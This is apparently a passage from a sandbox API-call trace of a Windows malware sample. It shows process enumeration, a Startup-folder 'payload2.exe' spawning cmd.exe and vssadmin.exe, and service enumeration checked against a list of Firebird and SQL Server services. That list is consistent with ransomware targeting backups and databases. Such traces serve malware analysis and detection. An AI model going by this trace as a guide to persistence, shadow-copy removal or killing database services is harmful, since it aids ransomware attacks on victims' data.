th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="challenging.exe")) returned 1 [0041.659] lstrlenW (lpString="challenging.exe") returned 15 [0041.659] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pgp prix.exe")) returned 1 [0041.660] lstrlenW (lpString="pgp prix.exe") returned 12 [0041.660] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="user-reno.exe")) returned 1 [0041.660] lstrlenW (lpString="user-reno.exe") returned 13 [0041.660] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="aggregate.exe")) returned 1 [0041.661] lstrlenW (lpString="aggregate.exe") returned 13 [0041.661] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dressed.exe")) returned 1 [0041.662] lstrlenW (lpString="dressed.exe") returned 11 [0041.662] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="accounts evaluated jr.exe")) returned 1 [0041.662] lstrlenW (lpString="accounts evaluated jr.exe") returned 25 [0041.662] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability_joined_liechtenstein.exe")) returned 1 [0041.663] lstrlenW (lpString="vulnerability_joined_liechtenstein.exe") returned 38 [0041.663] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="developing.exe")) returned 1 [0041.663] lstrlenW (lpString="developing.exe") returned 14 [0041.663] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="supported.exe")) returned 1 [0041.664] lstrlenW (lpString="supported.exe") returned 13 [0041.664] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x724, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="girlstionselect.exe")) returned 1 [0041.665] lstrlenW (lpString="girlstionselect.exe") returned 19 [0041.665] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x69c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="employedboysdesktop.exe")) returned 1 [0041.665] lstrlenW (lpString="employedboysdesktop.exe") returned 23 [0041.665] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="clay_enquiry_thee.exe")) returned 1 [0041.666] lstrlenW (lpString="clay_enquiry_thee.exe") returned 21 [0041.666] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="eating.exe")) returned 1 [0041.666] lstrlenW (lpString="eating.exe") returned 10 [0041.666] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="nh_protected.exe")) returned 1 [0041.667] lstrlenW (lpString="nh_protected.exe") returned 16 [0041.667] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="vulnerability.exe")) returned 1 [0041.667] lstrlenW (lpString="vulnerability.exe") returned 17 [0041.667] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="incidentoceaneast.exe")) returned 1 [0041.668] lstrlenW (lpString="incidentoceaneast.exe") returned 21 [0041.668] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ment_lo_animation.exe")) returned 1 [0041.669] lstrlenW (lpString="ment_lo_animation.exe") returned 21 [0041.669] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="counters_config_prostate.exe")) returned 1 [0041.669] lstrlenW (lpString="counters_config_prostate.exe") returned 28 [0041.669] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="teethpichuntercrude.exe")) returned 1 [0041.670] lstrlenW (lpString="teethpichuntercrude.exe") returned 23 [0041.670] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x814, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0041.671] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0041.671] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe")) returned 1 [0041.671] lstrlenW (lpString="cprogramdatamicrosoftwindowsstart menuprogramsstartuppayload2.exe") returned 65 [0041.671] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x9a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0041.672] lstrlenW (lpString="cmd.exe") returned 7 [0041.672] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x188, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0041.673] lstrlenW (lpString="conhost.exe") returned 11 [0041.673] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0041.674] lstrlenW (lpString="vssadmin.exe") returned 12 [0041.674] Process32NextW (in: hSnapshot=0x1cc, lppe=0x215fd34 | out: lppe=0x215fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa18, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x9b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0041.674] CloseHandle (hObject=0x1cc) returned 1 [0041.674] Sleep (dwMilliseconds=0x1f4) [0042.254] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x680350 [0042.254] EnumServicesStatusExW (in: hSCManager=0x680350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 0 [0042.255] GetLastError () returned 0xea [0042.255] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x123e) returned 0x3943b50 [0042.255] EnumServicesStatusExW (in: hSCManager=0x680350, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3943b50, cbBufSize=0x123e, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3943b50, pcbBytesNeeded=0x215ff44, lpServicesReturned=0x215ff5c, lpResumeHandle=0x0) returned 1 [0042.256] CloseServiceHandle (hSCObject=0x680350) returned 1 [0042.256] lstrlenW (lpString="Appinfo") returned 7 [0042.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0042.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0042.256] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0042.256] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0042.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0042.256] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0042.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0042.256] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0042.256] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0042.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0042.256] lstrlenW (lpString="AudioSrv") returned 8 [0042.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0042.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0042.256] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0042.256] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0042.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0042.256] lstrlenW (lpString="BFE") returned 3 [0042.256] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0042.256] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0042.256] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0042.256] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0042.256] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0042.257] lstrlenW (lpString="CryptSvc") returned 8 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0042.257] lstrlenW (lpString="CscService") returned 10 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0042.257] lstrlenW (lpString="DcomLaunch") returned 10 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0042.257] lstrlenW (lpString="Dhcp") returned 4 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0042.257] lstrlenW (lpString="Dnscache") returned 8 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0042.257] lstrlenW (lpString="DPS") returned 3 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0042.257] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0042.257] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0042.257] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0042.257] lstrlenW (lpString="eventlog") returned 8 [0042.257] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0042.257] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0042.258] lstrlenW (lpString="EventSystem") returned 11 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0042.258] lstrlenW (lpString="gpsvc") returned 5 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0042.258] lstrlenW (lpString="iphlpsvc") returned 8 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0042.258] lstrlenW (lpString="LanmanServer") returned 12 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0042.258] lstrlenW (lpString="LanmanWorkstation") returned 17 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0042.258] lstrlenW (lpString="lmhosts") returned 7 [0042.258] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0042.258] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0042.258] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0042.258] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0042.258] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0042.258] lstrlenW (lpString="MMCSS") returned 5 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0042.259] lstrlenW (lpString="MpsSvc") returned 6 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0042.259] lstrlenW (lpString="Netman") returned 6 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1 [0042.259] lstrlenW (lpString="netprofm") returned 8 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0042.259] lstrlenW (lpString="NlaSvc") returned 6 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0042.259] lstrlenW (lpString="nsi") returned 3 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0042.259] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0042.259] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0042.259] lstrlenW (lpString="PcaSvc") returned 6 [0042.259] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0042.259] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0042.259] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0042.260] lstrlenW (lpString="PlugPlay") returned 8 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0042.260] lstrlenW (lpString="Power") returned 5 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0042.260] lstrlenW (lpString="ProfSvc") returned 7 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0042.260] lstrlenW (lpString="RpcEptMapper") returned 12 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0042.260] lstrlenW (lpString="RpcSs") returned 5 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0042.260] lstrlenW (lpString="SamSs") returned 5 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0042.260] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0042.260] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0042.260] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0042.260] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0042.260] lstrlenW (lpString="Schedule") returned 8 [0042.260] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0042.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0042.261] lstrlenW (lpString="SENS") returned 4 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0042.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0042.261] lstrlenW (lpString="ShellHWDetection") returned 16 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0042.261] lstrlenW (lpString="Spooler") returned 7 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0042.261] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0042.261] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0042.261] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0042.261] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0042.261] lstrlenW (lpString="SysMain") returned 7 [0042.261] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0042.261] lstrcmpiW 